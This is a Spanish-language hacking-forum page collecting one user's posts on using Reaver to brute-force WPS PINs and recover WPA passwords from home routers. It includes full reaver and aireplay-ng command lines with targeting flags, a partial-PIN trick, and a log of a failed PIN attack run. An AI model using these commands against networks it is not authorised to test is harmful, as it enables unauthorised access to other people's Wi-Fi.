elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 29 Diciembre 2014, 19:42 pm
reaver -i mon0 -b mac_router -c x -a -L -r -n --dh-small -vv -d 5

Esta línea de comandos puede apurar el bloqueo del router como 6-7 pines, por lo que si alguno de ellos es válido deja la contraseña de tu router al descubierto. Probado en TP-Link, el famoso router que al parecer ha implementado el firmware probloqueo del Router ante un ataque reaver.  ;-)
2  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 3 Abril 2013, 21:33 pm
Ese tipo de router está bastante bien protegido contra el reaver, no sé hasta que punto es vulnerable, por otro lado wifiway está desactualizado si no me equivoco ahora mismo la vanguardia es wifislax para el tema wifi al menos, :-).
3  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 27 Noviembre 2012, 23:08 pm
Exacto he utilizado el siguiente comando:

   #reaver-wifislax -i mon0 -b 8c:0c:a3:xx:xx:xx -p XXXX -vv

Lo que no he utilizado es el parámetro "--no-checksum", "-p XXXX" son los 4 primeros dígitos obtenidos por la versión reaver standard, y que provocan el salto al 90.94% , cuando los detecta como válidos porque integran el Pin, en sus 4 primeras posiciones. También es cierto que se lleva, en casi 20 horas que me ha llevado la auditoría, 14 o 15 con el porcentaje del 99.99%, pero cambiando los pines, eso sí, pero nada, no entiendo de programación así que poco puedo aportar sobre tus comentarios sobre el código fuente.
4  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 27 Noviembre 2012, 19:35 pm
Módulo beta3, para el error del 99.99% probado en wifislax usb-live, resultado el mismo:
Código:
[+] 99.99% completado @ 2012-11-27 11:30:23 (14 segundos/pin)
[+] Probando pin XXXX9983
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[+] Probando pin XXXX9982
[+] Enviando requirimiento EAPOL
[+] Received identity request
[+] Enviando respuesta de identidad
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Probando pin XXXX9981
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[-] Fallo al recuperar el pin WPS.
wifislax ~ # 8C:0C:A3:XX:XX:XX
bash: 8C:0C:A3:XX:XX:XX: command not found
wifislax ~ #
wifislax ~ #
Módulo, el beta3, extraído del enlace puesto por warcry, 7 post más arriba, del foro seguridad wireless, me llama la atención que no intenta los pines del xxxx9999 al xxxx9990, saludos.

P.D. Las "X" corresponden a dígitos que he ocultado por temas de privacidad.
5  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 25 Noviembre 2012, 20:28 pm
Buenas tardes, yo he probado el módulo para el router 8c:0c:a3..., y salta al 50%, con la opción "-p" y 4 dígitos, pero luego va lentísimo porque tiene que recorrer del 0000 al 9999, y se hace eterno, aparte que no guarda la sesión me he dado cuenta, esto desde el wifislax 4.2 y en usb-live, esperemos que para próximas versiones quede integrado plenamente en el sistema, curiosidad de si con este método desaparece ese presunto bug que no es tal, lo ideal sería investigar qué routers dan ese error de 99.99%, y aplicarles este parche, digámoslo así. Saludos

6  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 1 Noviembre 2012, 19:32 pm
Menudo arsenal wireless, volviendo al reaver, me gustaría preguntar, si el wpscrackgui, añade alguna funcionalidad o simplemente es un entorno gráfico dentro del cual se ejecuta el reaver, si es así no veo la diferencia entre ejecutar reaver desde consola, a comando puro y duro y ejecutarlo desde el entorno gráfico, los resultados deben ser los mismos, deduzco. :huh:
7  Seguridad Informática / Wireless en Linux / Re: 8c:0c:a3:xx... Modem invul ? en: 31 Octubre 2012, 23:48 pm
En estos menesteres andaba yo, y me he encontrado con este hilo, la cuestión es que yo he probado también con el 1.3 y el 1.4 y solo conseguí el dichoso 99.99%, que repite el mismo pin todo el tiempo, con la alfa 1w. ¡Qué casualidad!

http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.705.html :rolleyes:
8  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 31 Octubre 2012, 14:06 pm
Gracias por tu respuesta, malamadre67 ¿Podrías poner también todos los parámetros? De todas formas he intentado ahora haciendo la asociación con aireplay-ng
Código:
 aireplay-ng -1 30 -a -h -e mon0
Por otra terminal lanzo el  reaver con la opción A para que no realice asociación:
Código:
reaver -i mon0 -b 8c:0c:a3:xx:xx:xx -A -c x -d 0 -vv
Y  me aparece un error: "Got a deauthentication packet ! (Waiting 3 seconds)", en la terminal del aireplay-ng, claro, va asociando y desasociando, continuamente, quizá esa es la explicación por la que se demoran o retrasan tanto los intentos de pin, suponiendo yo, que tampoco es algo que esté afirmando rotundamente. En cuanto a la señal es variable, con una rtl8187, 1000mW,  signal 55-59 PWR ¿No sé si es una señal aceptable para testear con el reaver? Pero ya digo yo que estos routers tienen alguna medida adicional de seguridad.
 :huh:
9  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 30 Octubre 2012, 15:26 pm
Buenas, traigo una instantänea del Reaver, en este caso 1.3, estrelländose contra el router archiconocido de timofonica:



Todo esto dentro del wifislax 4.2, de nuevo el dichoso bucle del 99.99%. :silbar:
Del 73% salto al 90.94%, con los digitos 9568, parece que detecta los 4primeros digitos pero se pierde en los 4 ultimos.
Los parämetros fueron:
Código:
reaver -i mon0 -b 8C:0C:A3:XX:XX:XX  -a  -S -r 100:10 -l 300  -d 5 -vv

Perdon por los acentos pero se me ha desvariado el teclado, no lo he arreglado aun.

Saludos.
10  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 23 Octubre 2012, 18:03 pm
bueas, pues he vuelto a probar con reaver 1.4 y una red con el mismo bssid 8C:0C:A3 y me da el mismo error, se queda al 99,99% probando el mismo pin, que puedo hacer? muchas gracias

Con un router del mismo pelaje estoy probando yo el reaver 1.3, en el wifislax 4.2, a ver que es lo que me depara, porque con el 1.4 he obtenido el mismo resultado 99.99%, probando el mismo pin, va despacito despaciiitooo, en cuánto tenga algo, lo comunico por aquí  :¬¬saludos
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines